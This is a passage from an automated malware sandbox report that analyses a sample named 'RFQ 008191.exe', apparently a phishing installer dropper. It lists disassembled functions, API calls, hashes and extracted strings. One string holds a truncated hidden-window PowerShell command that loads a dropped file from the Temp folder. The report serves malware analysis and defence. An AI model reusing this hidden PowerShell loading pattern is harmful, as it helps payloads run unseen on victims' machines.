                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                    • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                    • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                    • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                    Function 004044E2 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,004042B9), ref: 004044EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                    • Instruction ID: bf70c606a766814dc6d2ff6c1013b69bc1ca18b78975ad7518874070628387b3
                                                                    • Opcode Fuzzy Hash: 1338f86397f00e2d38996c3f1ae94053e56d426343b35a23e1e428530b57d47f
                                                                    • Instruction Fuzzy Hash: BEA00176544900ABCA16AB50EF0980ABB72BBA8701B528879A285510388B725921FB19
                                                                    Function 00401FC9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000,?), ref: 004055FE
                                                                      • Part of subcall function 004055C6: lstrlenW.KERNEL32(00403412,daniglacial,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,00403412,00000000), ref: 0040560E
                                                                      • Part of subcall function 004055C6: lstrcatW.KERNEL32(daniglacial,00403412,00403412,daniglacial,00000000,00418EC0,00000000), ref: 00405621
                                                                      • Part of subcall function 004055C6: SetWindowTextW.USER32(daniglacial,daniglacial), ref: 00405633
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405659
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405673
                                                                      • Part of subcall function 004055C6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405681
                                                                      • Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                      • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                      • Part of subcall function 004069E0: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069F1
                                                                      • Part of subcall function 004069E0: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A13
                                                                      • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2972824698-0
                                                                    • Opcode ID: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                    • Instruction ID: 2b527fce213089fa12a92f7baeb69a5519dacc7bd52e038cdd259e112745fe09
                                                                    • Opcode Fuzzy Hash: 1c7c1930723d4ccd5ae5bb4616c40caea24dbe794e3428a6cec7ded8fab62b7a
                                                                    • Instruction Fuzzy Hash: D0F09632904611ABDF30BBA59A895DF76B49F0035CF21413FE202B25D5C6BD4E41E76E

                                                                    Non-executed Functions

                                                                    Function 004049B1 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                    • lstrcmpiW.KERNEL32(: Completed,00422F08,00000000,?,?), ref: 00404B18
                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404B24
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                      • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                      • Part of subcall function 004067EF: CharNextW.USER32(?,"C:\Users\user\Desktop\RFQ 008191.exe",771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                      • Part of subcall function 004067EF: CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000,004034F7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                    • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,00000001,00420ED8,?,?,000003FB,?), ref: 00404BF9
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C14
                                                                      • Part of subcall function 00404D6D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                      • Part of subcall function 00404D6D: wsprintfW.USER32 ref: 00404E17
                                                                      • Part of subcall function 00404D6D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 00404B01
                                                                    • : Completed, xrefs: 00404B12, 00404B17, 00404B22
                                                                    • A, xrefs: 00404AD4
                                                                    • powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes, xrefs: 004049CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: : Completed$A$C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes$powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes
                                                                    • API String ID: 2624150263-880862450
                                                                    • Opcode ID: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction ID: bc895223e5afc39127eca44d4d62e4eac8fcc33aadfc8ea3f63fda85b43113f0
                                                                    • Opcode Fuzzy Hash: 935987cb4f9461c6069e20587a72eda96bebf85d42a230f0735d58c75f334840
                                                                    • Instruction Fuzzy Hash: 15A190B1A01208ABDB11DFA6DD45AAFB7B8EF84304F11403BF611B62D1D77C9A418B6D
                                                                    Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405C76
                                                                    • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CBE
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CE1
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CE7
                                                                    • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ 008191.exe"), ref: 00405CF7
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                    • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                    Strings
                                                                    • \*.*, xrefs: 00405CB8
                                                                    • "C:\Users\user\Desktop\RFQ 008191.exe", xrefs: 00405C56
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405C5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: "C:\Users\user\Desktop\RFQ 008191.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                    • API String ID: 2035342205-1450423552
                                                                    • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                    • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                                    Function 004021CF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040224E
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean, xrefs: 0040228E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Johannean
                                                                    • API String ID: 542301482-2601639953
                                                                    • Opcode ID: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                    • Instruction ID: 7c9e104ca8be0d6b13ead4f97a80eb64338f0e545dbf3bddd9310e0b0504cb73
                                                                    • Opcode Fuzzy Hash: 5b87d2b53e3a3be9ffe6b0ca134cc9b512e0d8dbe994290f8d28894833e6dd44
                                                                    • Instruction Fuzzy Hash: 54410575A00209AFCB00DFE4CA89AAD7BB5FF48318B20457EF505EB2D1DB799981CB54
                                                                    Function 00402930 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040293F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                    • Instruction ID: 9ac6bcba1e22606d8a3f98507846f809c14ae5b1cd4137618ecf9cbbc0e374ac
                                                                    • Opcode Fuzzy Hash: 5c150b9f35e6888bd535d4e9fbf2716058c991f00cae5ba87575c81c5c1b4e41
                                                                    • Instruction Fuzzy Hash: D6F08C71A04115AFD710EBA4DA499AEB378EF14328F6001BBE116F31E5D7B88E419B29
                                                                    Function 00404F2D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                    • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                    • DeleteObject.GDI32(00000000), ref: 00405027
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                    • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 00405357
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405367
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                    • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                    • ShowWindow.USER32(00000000), ref: 00405523
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330545906.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ 008191.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 2564846305-813528018
                                                                    • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                    • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                    Function 0040467F Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                    • GetSysColor.USER32(?), ref: 0040475F
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                    • lstrlenW.KERNEL32(?), ref: 00404780
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                    • SendMessageW.USER32(00000000), ref: 00404802
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                    • SetCursor.USER32(00000000), ref: 00404881
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                    • SetCursor.USER32(00000000), ref: 0040489D
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1330290654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1330272699.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330318442.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1330344837.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
